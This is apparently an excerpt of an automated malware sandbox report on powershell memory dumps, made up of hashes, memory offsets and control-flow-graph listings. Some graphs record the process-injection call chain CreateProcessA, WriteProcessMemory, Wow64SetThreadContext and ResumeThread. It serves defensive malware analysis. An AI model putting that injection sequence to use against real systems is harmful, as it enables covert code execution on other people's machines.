                                            • Instruction Fuzzy Hash: 2301843010CB0C4FD748EF0CE051AB5B3E0FB85360F10056DE58AC3651DB26E882CB45
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2985952980.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ff848e30000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4978df10a3d4a18fb0b41c855291dc4848c40e8599b68138bbd56ded05dee086
                                            • Instruction ID: 506bdfb99e2dec53b08e22d32c7801a96d2e156656b78de6fca6d15ce60fcb3a
                                            • Opcode Fuzzy Hash: 4978df10a3d4a18fb0b41c855291dc4848c40e8599b68138bbd56ded05dee086
                                            • Instruction Fuzzy Hash: 96F05831A4D5448FD755EA5CE4418A8B7E0FF55364B4500F7E149CB063DB3AAC618754
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2981497033.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ff848d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^=$M_^@$M_^T$M_^U$M_^W$M_^Y
                                            • API String ID: 0-134851635
                                            • Opcode ID: c13aba1a716fc0ae0e2d6790d9fdd66f4697b22927055a5c4e7fc91781afd85e
                                            • Instruction ID: 22851a76a49ed95d0db5c5987022b14495134af06ce0466b3ce70c6f958fa92f
                                            • Opcode Fuzzy Hash: c13aba1a716fc0ae0e2d6790d9fdd66f4697b22927055a5c4e7fc91781afd85e
                                            • Instruction Fuzzy Hash: F5218BB3715529EED20136ADB805AE83780EF913B2B8603F2D165DF183FD14648B89E4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2981497033.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ff848d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^$M_^
                                            • API String ID: 0-2396788759
                                            • Opcode ID: 1fdc13ce4dcfccf9931fa775e7a0b3ebc21c8a77d50ef8354f95797d23b4237d
                                            • Instruction ID: a9c1e46a5eb608a95f93bdc53e3910eba0d0749163a7295e7cc2211da9fca05b
                                            • Opcode Fuzzy Hash: 1fdc13ce4dcfccf9931fa775e7a0b3ebc21c8a77d50ef8354f95797d23b4237d
                                            • Instruction Fuzzy Hash: C821F6B3E0E9D68FE347663D18681996FA0FF62350B0D01F2E0989B192FE15580B9215
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2981497033.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ff848d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^
                                            • API String ID: 0-1397233021
                                            • Opcode ID: 88481f96fb587ce1609e62ef2af72c7373cb4f65637d9e9ce4d9d3d8c7ab3446
                                            • Instruction ID: 171eec587e467c2d19119eb7f6e5c8791f40dadf91f20ba702ae79a7f682f8fa
                                            • Opcode Fuzzy Hash: 88481f96fb587ce1609e62ef2af72c7373cb4f65637d9e9ce4d9d3d8c7ab3446
                                            • Instruction Fuzzy Hash: 60416673D0EADE4FE356A6385CB91A43F90EF12664F0901F7D4D8DB1A3EE44180A9316
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2255089263.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_7ff848d70000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction ID: 75b0e60ec8af4c68cee1d1426f2401301e678710f95b1283c1ce0c07bc88b80d
                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction Fuzzy Hash: 9001843010CB084FD748EF0CE051AB5B3E0FB85360F10056EE58AC3691DB26E882CB45

                                            Execution Graph

                                            Execution Coverage:6%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:12
                                            Total number of Limit Nodes:0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 7ff848e20ee3-7ff848e20f19 3 7ff848e210ad-7ff848e2115f 0->3 4 7ff848e20f1f-7ff848e20f29 0->4 54 7ff848e21161 3->54 55 7ff848e21166-7ff848e21177 3->55 5 7ff848e20f2b-7ff848e20f40 4->5 6 7ff848e20f42-7ff848e20f47 4->6 5->6 9 7ff848e2104a-7ff848e21054 6->9 10 7ff848e20f4d-7ff848e20f50 6->10 11 7ff848e21065-7ff848e210aa 9->11 12 7ff848e21056-7ff848e21064 9->12 14 7ff848e20f99 10->14 15 7ff848e20f52-7ff848e20f65 10->15 11->3 17 7ff848e20f9b-7ff848e20f9d 14->17 15->3 23 7ff848e20f6b-7ff848e20f75 15->23 17->9 21 7ff848e20fa3-7ff848e20fa6 17->21 25 7ff848e20fa8-7ff848e20fb1 21->25 26 7ff848e20fbd-7ff848e20fc1 21->26 28 7ff848e20f8e-7ff848e20f97 23->28 29 7ff848e20f77-7ff848e20f84 23->29 25->26 26->9 34 7ff848e20fc7-7ff848e20fcd 26->34 28->17 29->28 36 7ff848e20f86-7ff848e20f8c 29->36 37 7ff848e20fe9-7ff848e20fef 34->37 38 7ff848e20fcf-7ff848e20fdc 34->38 36->28 41 7ff848e2100b-7ff848e21021 37->41 42 7ff848e20ff1-7ff848e21009 37->42 38->37 44 7ff848e20fde-7ff848e20fe7 38->44 48 7ff848e2103a-7ff848e21049 41->48 49 7ff848e21023-7ff848e21033 41->49 42->41 44->37 54->55 56 7ff848e21163 54->56 57 7ff848e21179 55->57 58 7ff848e2117e-7ff848e211c9 55->58 56->55 57->58 59 7ff848e2117b 57->59 61 7ff848e211cb-7ff848e211d3 58->61 62 7ff848e211df-7ff848e21219 58->62 59->58 61->62 65 7ff848e213aa-7ff848e2145b 62->65 66 7ff848e2121f-7ff848e21229 62->66 116 7ff848e2145d 65->116 117 7ff848e21462-7ff848e21473 65->117 67 7ff848e2122b-7ff848e21240 66->67 68 7ff848e21242-7ff848e21247 66->68 67->68 71 7ff848e2124d-7ff848e21250 68->71 72 7ff848e21347-7ff848e21351 68->72 74 7ff848e21299 71->74 75 7ff848e21252-7ff848e21265 71->75 76 7ff848e21353-7ff848e21361 72->76 77 7ff848e21362-7ff848e213a7 72->77 78 7ff848e2129b-7ff848e2129d 74->78 75->65 89 7ff848e2126b-7ff848e21275 75->89 77->65 78->72 82 7ff848e212a3-7ff848e212a6 78->82 86 7ff848e212a8-7ff848e212b1 82->86 87 7ff848e212bd-7ff848e212c1 82->87 86->87 87->72 95 7ff848e212c7-7ff848e212cd 87->95 92 7ff848e2128e-7ff848e21297 89->92 93 7ff848e21277-7ff848e21284 89->93 92->78 93->92 98 7ff848e21286-7ff848e2128c 93->98 99 7ff848e212e9-7ff848e212ef 95->99 100 7ff848e212cf-7ff848e212dc 95->100 98->92 101 7ff848e2130b-7ff848e2131e 99->101 102 7ff848e212f1-7ff848e21309 99->102 100->99 107 7ff848e212de-7ff848e212e7 100->107 112 7ff848e21320-7ff848e21335 101->112 113 7ff848e21337-7ff848e21346 101->113 102->101 107->99 112->113 116->117 118 7ff848e2145f 116->118 119 7ff848e2147a-7ff848e214da 117->119 120 7ff848e21475 117->120 118->117 124 7ff848e214dc-7ff848e2150f 119->124 125 7ff848e21524-7ff848e2152f 119->125 120->119 121 7ff848e21477 120->121 121->119 130 7ff848e2169f-7ff848e2174d 124->130 131 7ff848e21515-7ff848e2151f 124->131 128 7ff848e21539-7ff848e2153f 125->128 129 7ff848e21531-7ff848e21537 125->129 132 7ff848e21545-7ff848e21548 128->132 133 7ff848e21634-7ff848e2163e 128->133 129->128 168 7ff848e21759-7ff848e21765 130->168 169 7ff848e2174f-7ff848e21755 130->169 131->128 134 7ff848e21521-7ff848e21522 131->134 138 7ff848e2154a-7ff848e2155d 132->138 139 7ff848e21591 132->139 135 7ff848e21651-7ff848e2169c 133->135 136 7ff848e21640-7ff848e21650 133->136 134->125 135->130 138->130 149 7ff848e21563-7ff848e2156d 138->149 143 7ff848e21593-7ff848e21595 139->143 143->133 144 7ff848e2159b-7ff848e2159e 143->144 144->133 147 7ff848e215a4-7ff848e215a7 144->147 147->133 152 7ff848e215ad-7ff848e215e1 147->152 153 7ff848e2156f-7ff848e21584 149->153 154 7ff848e21586-7ff848e2158f 149->154 152->133 164 7ff848e215e3-7ff848e215e9 152->164 153->154 154->143 166 7ff848e21608-7ff848e2161e 164->166 167 7ff848e215eb-7ff848e21606 164->167 171 7ff848e21624-7ff848e21633 166->171 167->166 172 7ff848e21771-7ff848e217f4 168->172 173 7ff848e21767-7ff848e2176d 168->173 169->168 177 7ff848e2183b-7ff848e21845 172->177 178 7ff848e217f6-7ff848e21838 172->178 173->172 180 7ff848e21850-7ff848e2189b 177->180 181 7ff848e21847-7ff848e2184f 177->181
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2639604185.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_H
                                            • API String ID: 0-3997733227
                                            • Opcode ID: 2aaa3be1098c6ef7b7e96c62b2be836d8ce87b528fef338f77c9c8fdff5e2c29
                                            • Instruction ID: a920d1dad18a30463429d202a83fa61ef299b264e1e7b0394fae83a161b47fb9
                                            • Opcode Fuzzy Hash: 2aaa3be1098c6ef7b7e96c62b2be836d8ce87b528fef338f77c9c8fdff5e2c29
                                            • Instruction Fuzzy Hash: EE724631A0EB894FE756AB6858155B47BE1FF46360F0901FFD04DC7193DE2AAC0A8356

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 188 7ff848d5a084-7ff848d5a08b 189 7ff848d5a08d-7ff848d5a095 188->189 190 7ff848d5a096-7ff848d5a164 188->190 189->190 194 7ff848d5a166-7ff848d5a175 190->194 195 7ff848d5a1c2-7ff848d5a1f4 190->195 194->195 196 7ff848d5a177-7ff848d5a17a 194->196 200 7ff848d5a1f6-7ff848d5a205 195->200 201 7ff848d5a252-7ff848d5a2c6 195->201 198 7ff848d5a17c-7ff848d5a18f 196->198 199 7ff848d5a1b4-7ff848d5a1bc 196->199 202 7ff848d5a191 198->202 203 7ff848d5a193-7ff848d5a1a6 198->203 199->195 200->201 204 7ff848d5a207-7ff848d5a20a 200->204 211 7ff848d5a2c8-7ff848d5a2d7 201->211 212 7ff848d5a324-7ff848d5a42d CreateProcessA 201->212 202->203 203->203 205 7ff848d5a1a8-7ff848d5a1b0 203->205 206 7ff848d5a20c-7ff848d5a21f 204->206 207 7ff848d5a244-7ff848d5a24c 204->207 205->199 209 7ff848d5a221 206->209 210 7ff848d5a223-7ff848d5a236 206->210 207->201 209->210 210->210 213 7ff848d5a238-7ff848d5a240 210->213 211->212 214 7ff848d5a2d9-7ff848d5a2dc 211->214 223 7ff848d5a42f 212->223 224 7ff848d5a435-7ff848d5a4c6 call 7ff848d5a4e2 212->224 213->207 216 7ff848d5a2de-7ff848d5a2f1 214->216 217 7ff848d5a316-7ff848d5a31e 214->217 219 7ff848d5a2f5-7ff848d5a308 216->219 220 7ff848d5a2f3 216->220 217->212 219->219 221 7ff848d5a30a-7ff848d5a312 219->221 220->219 221->217 223->224 233 7ff848d5a4cd-7ff848d5a4e1 224->233 234 7ff848d5a4c8 224->234 234->233
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2633392242.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 52ffcb8b556c2718d2bc0f951821ce913d77aed392e0b1f1b49334def45237e0
                                            • Instruction ID: 86f70337252057393c83f5b84fa2aecb3c87c4cba5e3ec7d520c518467511564
                                            • Opcode Fuzzy Hash: 52ffcb8b556c2718d2bc0f951821ce913d77aed392e0b1f1b49334def45237e0
                                            • Instruction Fuzzy Hash: FDD1A330919A8D8FEB68EF18DC467E977D1FB59311F00422ED84EC7291DF74A9858B82

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 235 7ff848d59d24-7ff848d59d2b 236 7ff848d59d2d-7ff848d59d35 235->236 237 7ff848d59d36-7ff848d59d4a 235->237 236->237 238 7ff848d59d4c-7ff848d59d91 237->238 239 7ff848d59d94-7ff848d59dc5 237->239 238->239 242 7ff848d59dcf-7ff848d59e24 WriteProcessMemory 239->242 243 7ff848d59dc7-7ff848d59dcc 239->243 245 7ff848d59e2c-7ff848d59e5d 242->245 246 7ff848d59e26 242->246 243->242 246->245
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2633392242.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 7393fc2fe50e90fff3e324870a91714b75351aaa38a38e32f366f505eec1e9f6
                                            • Instruction ID: 3b8739cef2ef727c58df28f311163b589c9c1631d3a8399a1cc3dab6c55aeacd
                                            • Opcode Fuzzy Hash: 7393fc2fe50e90fff3e324870a91714b75351aaa38a38e32f366f505eec1e9f6
                                            • Instruction Fuzzy Hash: 3041F731D0DB185FDB18AB98A8066F9BBE0FB95350F00426FE449D3286CB74A8498795

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 248 7ff848d59b18-7ff848d59b1f 249 7ff848d59b2a-7ff848d59b3a 248->249 250 7ff848d59b21-7ff848d59b29 248->250 251 7ff848d59b3c-7ff848d59b82 249->251 252 7ff848d59b84-7ff848d59b9d 249->252 250->249 251->252 256 7ff848d59b9f-7ff848d59ba4 252->256 257 7ff848d59ba7-7ff848d59be2 Wow64SetThreadContext 252->257 256->257 259 7ff848d59bea-7ff848d59c19 257->259 260 7ff848d59be4 257->260 260->259
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2633392242.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 6e0c3936b276ba458614968bafe8d862813f54bd4f9fbb1c31fde1afe48cc3f9
                                            • Instruction ID: fc86e2fd46cd24dc471d6f173b40ef183b9dff3ef96db3344daf3fc9c54ba6d2
                                            • Opcode Fuzzy Hash: 6e0c3936b276ba458614968bafe8d862813f54bd4f9fbb1c31fde1afe48cc3f9
                                            • Instruction Fuzzy Hash: DD312A31D0DB184FEB29AB68A8456FABBE1EF55311F04023FD04AD3582DF74640A8795

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 262 7ff848d59a1d-7ff848d59a29 263 7ff848d59a2b-7ff848d59a33 262->263 264 7ff848d59a34-7ff848d59a43 262->264 263->264 265 7ff848d59a4e-7ff848d59a5a 264->265 266 7ff848d59a45-7ff848d59a4d 264->266 267 7ff848d59a5c-7ff848d59aa3 265->267 268 7ff848d59aa4-7ff848d59ae4 ResumeThread 265->268 266->265 267->268 273 7ff848d59aec-7ff848d59b11 268->273 274 7ff848d59ae6 268->274 274->273
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2633392242.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 0c9777edd8a5cf57f409089dfc7b37fa6dc4730144035b78fb3e8e7bc56b08fc
                                            • Instruction ID: 0df661823ed4d2299cc6a6d78533b0d3567ec522c28f926665ab25f8ba6d4536
                                            • Opcode Fuzzy Hash: 0c9777edd8a5cf57f409089dfc7b37fa6dc4730144035b78fb3e8e7bc56b08fc
                                            • Instruction Fuzzy Hash: 4E31163090E7885FEB5ADB6898567E9BFE0EF56320F0442ABD049C7197CA786405C762

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 276 7ff848e20522-7ff848e2053a 277 7ff848e2053c-7ff848e2056a 276->277 278 7ff848e20584 276->278 281 7ff848e20570-7ff848e2057a 277->281 282 7ff848e206d7-7ff848e20717 277->282 280 7ff848e20585-7ff848e20589 278->280 283 7ff848e2058b-7ff848e20591 280->283 284 7ff848e20593-7ff848e20598 280->284 281->284 285 7ff848e2057c-7ff848e20583 281->285 301 7ff848e20719-7ff848e20787 282->301 302 7ff848e206ad-7ff848e206d4 282->302 283->284 286 7ff848e2059e-7ff848e205a1 284->286 287 7ff848e20670-7ff848e2067a 284->287 285->278 285->280 286->287 292 7ff848e205a7-7ff848e205aa 286->292 290 7ff848e2068b-7ff848e206a9 287->290 291 7ff848e2067c-7ff848e2068a 287->291 290->302 293 7ff848e205ac-7ff848e205b5 292->293 294 7ff848e205c1-7ff848e205c5 292->294 293->294 294->287 303 7ff848e205cb-7ff848e205ce 294->303 330 7ff848e20789 301->330 331 7ff848e2078e-7ff848e2079f 301->331 302->282 305 7ff848e205d0-7ff848e205e3 303->305 306 7ff848e205e5 303->306 309 7ff848e205e7-7ff848e205e9 305->309 306->309 309->287 311 7ff848e205ef-7ff848e205f5 309->311 312 7ff848e20611-7ff848e20617 311->312 313 7ff848e205f7-7ff848e20604 311->313 316 7ff848e20619-7ff848e20631 312->316 317 7ff848e20633-7ff848e20637 312->317 313->312 319 7ff848e20606-7ff848e2060f 313->319 316->317 321 7ff848e2063e-7ff848e20647 317->321 319->312 322 7ff848e20649-7ff848e20656 321->322 323 7ff848e20660-7ff848e2066f 321->323 322->323 328 7ff848e20658-7ff848e2065e 322->328 328->323 330->331 333 7ff848e2078b 330->333 334 7ff848e207a1 331->334 335 7ff848e207a6-7ff848e20802 331->335 333->331 334->335 336 7ff848e207a3 334->336 338 7ff848e2084c-7ff848e20852 335->338 339 7ff848e20804-7ff848e2080a 335->339 336->335 342 7ff848e20854-7ff848e20856 338->342 339->342 343 7ff848e2080c-7ff848e20837 339->343 345 7ff848e20858-7ff848e20861 342->345 346 7ff848e20863-7ff848e20870 342->346 347 7ff848e2083d-7ff848e20847 343->347 348 7ff848e2098f-7ff848e20a41 343->348 345->346 353 7ff848e20930-7ff848e2093a 346->353 354 7ff848e20876-7ff848e20879 346->354 347->346 349 7ff848e20849-7ff848e2084a 347->349 390 7ff848e20a43 348->390 391 7ff848e20a44-7ff848e20a55 348->391 349->338 356 7ff848e20949-7ff848e2098c 353->356 357 7ff848e2093c-7ff848e20948 353->357 354->353 358 7ff848e2087f-7ff848e20887 354->358 356->348 358->348 361 7ff848e2088d-7ff848e20897 358->361 363 7ff848e20899-7ff848e208a9 361->363 364 7ff848e208b0-7ff848e208b4 361->364 369 7ff848e208ab-7ff848e208ae 363->369 370 7ff848e208df-7ff848e208f9 363->370 364->353 366 7ff848e208b6-7ff848e208b9 364->366 371 7ff848e208bb-7ff848e208c4 366->371 372 7ff848e208d0-7ff848e208d4 366->372 369->364 379 7ff848e208fb-7ff848e20909 370->379 371->372 372->353 378 7ff848e208d6-7ff848e208dc 372->378 378->379 380 7ff848e208de 378->380 385 7ff848e2090b-7ff848e20918 379->385 386 7ff848e20922-7ff848e2092f 379->386 380->370 385->386 389 7ff848e2091a-7ff848e20920 385->389 389->386 390->391 392 7ff848e20a58-7ff848e20aa1 391->392 393 7ff848e20a57 391->393 396 7ff848e20aa3-7ff848e20aa8 392->396 397 7ff848e20ab7-7ff848e20ae4 392->397 393->392 398 7ff848e20aaa 396->398 399 7ff848e20aac-7ff848e20ab5 396->399 401 7ff848e20c09-7ff848e20cb9 397->401 402 7ff848e20aea-7ff848e20af4 397->402 398->399 399->397 439 7ff848e20cbb 401->439 440 7ff848e20cbc-7ff848e20ccd 401->440 403 7ff848e20b0d-7ff848e20b12 402->403 404 7ff848e20af6-7ff848e20b03 402->404 405 7ff848e20b18-7ff848e20b1b 403->405 406 7ff848e20baa-7ff848e20bb4 403->406 404->403 413 7ff848e20b05-7ff848e20b0b 404->413 405->406 409 7ff848e20b21-7ff848e20b24 405->409 411 7ff848e20bc3-7ff848e20c06 406->411 412 7ff848e20bb6-7ff848e20bc2 406->412 414 7ff848e20b4b 409->414 415 7ff848e20b26-7ff848e20b49 409->415 411->401 413->403 419 7ff848e20b4d-7ff848e20b4f 414->419 415->419 419->406 423 7ff848e20b51-7ff848e20b5b 419->423 423->406 429 7ff848e20b5d-7ff848e20b67 423->429 431 7ff848e20b69-7ff848e20b73 429->431 433 7ff848e20b7a-7ff848e20b83 431->433 434 7ff848e20b9c-7ff848e20ba9 433->434 435 7ff848e20b85-7ff848e20b92 433->435 435->434 438 7ff848e20b94-7ff848e20b9a 435->438 438->434 439->440 441 7ff848e20ccf 440->441 442 7ff848e20cd0-7ff848e20d19 440->442 441->442 443 7ff848e20d1b-7ff848e20d25 442->443 444 7ff848e20d2f-7ff848e20d53 442->444 443->444 447 7ff848e20d59-7ff848e20d62 444->447 448 7ff848e20e32-7ff848e20e3c 444->448 447->448 450 7ff848e20e48-7ff848e20e88 448->450 451 7ff848e20e3e-7ff848e20e47 448->451
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2639604185.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 353947f4ae15d16e2c0fd462f48c363bccc46e7ad4ebce357e918a74445b513c
                                            • Instruction ID: 3e8be6faddb87eee3a571e5ef23c1be5691cac279404e8c967dbd8229e4f9e98
                                            • Opcode Fuzzy Hash: 353947f4ae15d16e2c0fd462f48c363bccc46e7ad4ebce357e918a74445b513c
                                            • Instruction Fuzzy Hash: EF621321E0EA894FE7A6BB2858252B57BE1FF56754F0801FBD04DC71D3DA289C09C396

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2639604185.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4d85ebc0bcc9fe67494b2c5a03a5d06aa149937b7532ee9d6521bbc2b25d05e
                                            • Instruction ID: dfede754cc15f33c728715df9e93727b006c2decbcc0e0ec757dd8fda16d760a
                                            • Opcode Fuzzy Hash: c4d85ebc0bcc9fe67494b2c5a03a5d06aa149937b7532ee9d6521bbc2b25d05e
                                            • Instruction Fuzzy Hash: 7291B221A0EBCA8FE756EB3C98545603BA1EF57750B1901FBC049CB1E3DA29AC4AC355

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2639604185.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc10dd4b94d3388b7cab2e2727657ae3475ab9a4fb61a897cf6d01c495e16d11
                                            • Instruction ID: 41f94cd8dfee0f0a2704ff9793bedd9764028937e3302487ccf270494c13f710
                                            • Opcode Fuzzy Hash: fc10dd4b94d3388b7cab2e2727657ae3475ab9a4fb61a897cf6d01c495e16d11
                                            • Instruction Fuzzy Hash: 09515331E1DA898FE7A9EA6C54511787BD1FF96254F0801FAD44EC7192CB2ABC068386

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2639604185.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf7b2f5ace076c856a95b8c229818eefbeb9916490606f239c97455b3c7951dd
                                            • Instruction ID: 8d19c70b4c12b60e5ce0e57a611425d8a4aad93be79c01b1a541954defa323df
                                            • Opcode Fuzzy Hash: bf7b2f5ace076c856a95b8c229818eefbeb9916490606f239c97455b3c7951dd
                                            • Instruction Fuzzy Hash: 2041C021D1EA9A4FE7B6B72808682B46BE1FF16784F4900FAC448C71D3DE299C098756

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2639604185.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9155987fbbc74651571a8c3bb6d92721e5c74d60a107b52b681b912b3de6e0e
                                            • Instruction ID: 3dcf7a93a22a892d2109e870fca4ddfe409074b0fa98090f2fdfa1318e0439b4
                                            • Opcode Fuzzy Hash: f9155987fbbc74651571a8c3bb6d92721e5c74d60a107b52b681b912b3de6e0e
                                            • Instruction Fuzzy Hash: 0041B330A0DB8A8FDB46FB2888909643BA1FF57340B5901EAC049CB1E3DA25EC4DC755

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 715 7ff848e205b9-7ff848e205c5 717 7ff848e205cb-7ff848e205ce 715->717 718 7ff848e20670-7ff848e2067a 715->718 721 7ff848e205d0-7ff848e205e3 717->721 722 7ff848e205e5 717->722 719 7ff848e2068b-7ff848e206a9 718->719 720 7ff848e2067c-7ff848e2068a 718->720 733 7ff848e206ad-7ff848e20717 719->733 724 7ff848e205e7-7ff848e205e9 721->724 722->724 724->718 726 7ff848e205ef-7ff848e205f5 724->726 728 7ff848e20611-7ff848e20617 726->728 729 7ff848e205f7-7ff848e20604 726->729 731 7ff848e20619-7ff848e20631 728->731 732 7ff848e20633-7ff848e20637 728->732 729->728 734 7ff848e20606-7ff848e2060f 729->734 731->732 736 7ff848e2063e-7ff848e20647 732->736 749 7ff848e20719-7ff848e20787 733->749 734->728 737 7ff848e20649-7ff848e20656 736->737 738 7ff848e20660-7ff848e2066f 736->738 737->738 743 7ff848e20658-7ff848e2065e 737->743 743->738 756 7ff848e20789 749->756 757 7ff848e2078e-7ff848e2079f 749->757 756->757 758 7ff848e2078b 756->758 759 7ff848e207a1 757->759 760 7ff848e207a6-7ff848e20802 757->760 758->757 759->760 761 7ff848e207a3 759->761 763 7ff848e2084c-7ff848e20852 760->763 764 7ff848e20804-7ff848e2080a 760->764 761->760 767 7ff848e20854-7ff848e20856 763->767 764->767 768 7ff848e2080c-7ff848e20837 764->768 770 7ff848e20858-7ff848e20861 767->770 771 7ff848e20863-7ff848e20870 767->771 772 7ff848e2083d-7ff848e20847 768->772 773 7ff848e2098f-7ff848e20a41 768->773 770->771 778 7ff848e20930-7ff848e2093a 771->778 779 7ff848e20876-7ff848e20879 771->779 772->771 774 7ff848e20849-7ff848e2084a 772->774 815 7ff848e20a43 773->815 816 7ff848e20a44-7ff848e20a55 773->816 774->763 781 7ff848e20949-7ff848e2098c 778->781 782 7ff848e2093c-7ff848e20948 778->782 779->778 783 7ff848e2087f-7ff848e20887 779->783 781->773 783->773 786 7ff848e2088d-7ff848e20897 783->786 788 7ff848e20899-7ff848e208a9 786->788 789 7ff848e208b0-7ff848e208b4 786->789 794 7ff848e208ab-7ff848e208ae 788->794 795 7ff848e208df-7ff848e208f9 788->795 789->778 791 7ff848e208b6-7ff848e208b9 789->791 796 7ff848e208bb-7ff848e208c4 791->796 797 7ff848e208d0-7ff848e208d4 791->797 794->789 804 7ff848e208fb-7ff848e20909 795->804 796->797 797->778 803 7ff848e208d6-7ff848e208dc 797->803 803->804 805 7ff848e208de 803->805 810 7ff848e2090b-7ff848e20918 804->810 811 7ff848e20922-7ff848e2092f 804->811 805->795 810->811 814 7ff848e2091a-7ff848e20920 810->814 814->811 815->816 817 7ff848e20a58-7ff848e20aa1 816->817 818 7ff848e20a57 816->818 821 7ff848e20aa3-7ff848e20aa8 817->821 822 7ff848e20ab7-7ff848e20ae4 817->822 818->817 823 7ff848e20aaa 821->823 824 7ff848e20aac-7ff848e20ab5 